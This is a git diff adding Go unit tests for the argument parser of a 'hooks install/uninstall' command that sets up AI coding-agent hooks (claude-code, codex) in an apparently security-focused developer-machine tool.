%s -`, buildinfo.Version, name, +`, buildinfo.Version, name, name, name, name, name, name, name, name, name, name, name, name, name, buildinfo.AgentURL) diff --git a/internal/cli/cli_test.go b/internal/cli/cli_test.go index 32cd6c5..a3865cc 100644 --- a/internal/cli/cli_test.go +++ b/internal/cli/cli_test.go @@ -181,3 +181,107 @@ func TestParse_FlagCombinations(t *testing.T) { t.Errorf("unexpected config: %+v", cfg) } } + +// --- AI agent hooks group --- + +func TestParse_HooksInstall_NoAgent(t *testing.T) { + cfg, err := Parse([]string{"hooks", "install"}) + if err != nil { + t.Fatal(err) + } + if cfg.Command != "hooks install" { + t.Errorf("expected command=`hooks install`, got %q", cfg.Command) + } + if cfg.HooksAgent != "" { + t.Errorf("expected empty HooksAgent (= all detected), got %q", cfg.HooksAgent) + } +} + +func TestParse_HooksInstall_AgentSpaceForm(t *testing.T) { + cfg, err := Parse([]string{"hooks", "install", "--agent", "claude-code"}) + if err != nil { + t.Fatal(err) + } + if cfg.Command != "hooks install" || cfg.HooksAgent != "claude-code" { + t.Errorf("unexpected: cmd=%q agent=%q", cfg.Command, cfg.HooksAgent) + } +} + +func TestParse_HooksInstall_AgentEqualsForm(t *testing.T) { + cfg, err := Parse([]string{"hooks", "install", "--agent=codex"}) + if err != nil { + t.Fatal(err) + } + if cfg.HooksAgent != "codex" { + t.Errorf("expected codex, got %q", cfg.HooksAgent) + } +} + +func TestParse_HooksUninstall(t *testing.T) { + cfg, err := Parse([]string{"hooks", "uninstall", "--agent", "codex"}) + if err != nil { + t.Fatal(err) + } + if cfg.Command != "hooks uninstall" || cfg.HooksAgent != "codex" { + t.Errorf("unexpected: cmd=%q agent=%q", cfg.Command, cfg.HooksAgent) + } +} + +func TestParse_HooksMissingSubcommand(t *testing.T) { + _, err := Parse([]string{"hooks"}) + if err == nil { + t.Error("expected error for bare `hooks` with no subcommand") + } +} + +func TestParse_HooksUnknownSubcommand(t *testing.T) { + _, err := Parse([]string{"hooks", 
"frobnicate"}) + if err == nil { + t.Error("expected error for unknown hooks subcommand") + } +} + +func TestParse_HooksUnsupportedAgent(t *testing.T) { + _, err := Parse([]string{"hooks", "install", "--agent", "cursor"}) + if err == nil { + t.Error("expected error for unsupported agent") + } +} + +func TestParse_HooksAgentMissingValue(t *testing.T) { + cases := [][]string{ + {"hooks", "install", "--agent"}, + {"hooks", "install", "--agent="}, + {"hooks", "uninstall", "--agent="}, + } + for _, args := range cases { + _, err := Parse(args) + if err == nil { + t.Errorf("expected error for missing --agent value: %v", args) + } + } +} + +// DMG global flags must not leak into the hooks group. +func TestParse_HooksRejectsGlobalFlags(t *testing.T) { + cases := [][]string{ + {"hooks", "install", "--json"}, + {"hooks", "install", "--verbose"}, + {"hooks", "install", "--search-dirs", "/tmp"}, + {"hooks", "install", "--enable-npm-scan"}, + {"hooks", "install", "--color=always"}, + {"hooks", "uninstall", "--pretty"}, + } + for _, args := range cases { + _, err := Parse(args) + if err == nil { + t.Errorf("expected error rejecting global flag in %v", args) + } + } +} + +// The `_hook` runtime is intentionally not handled by Parse — main.go +// intercepts it before any init runs to honor the fail-open contract. +// See internal/aiagents/cli/hook_test.go for handler-level tests and +// cmd/stepsecurity-dev-machine-guard/main_test.go for the integration +// test that asserts the binary always exits 0 on `_hook` invocations.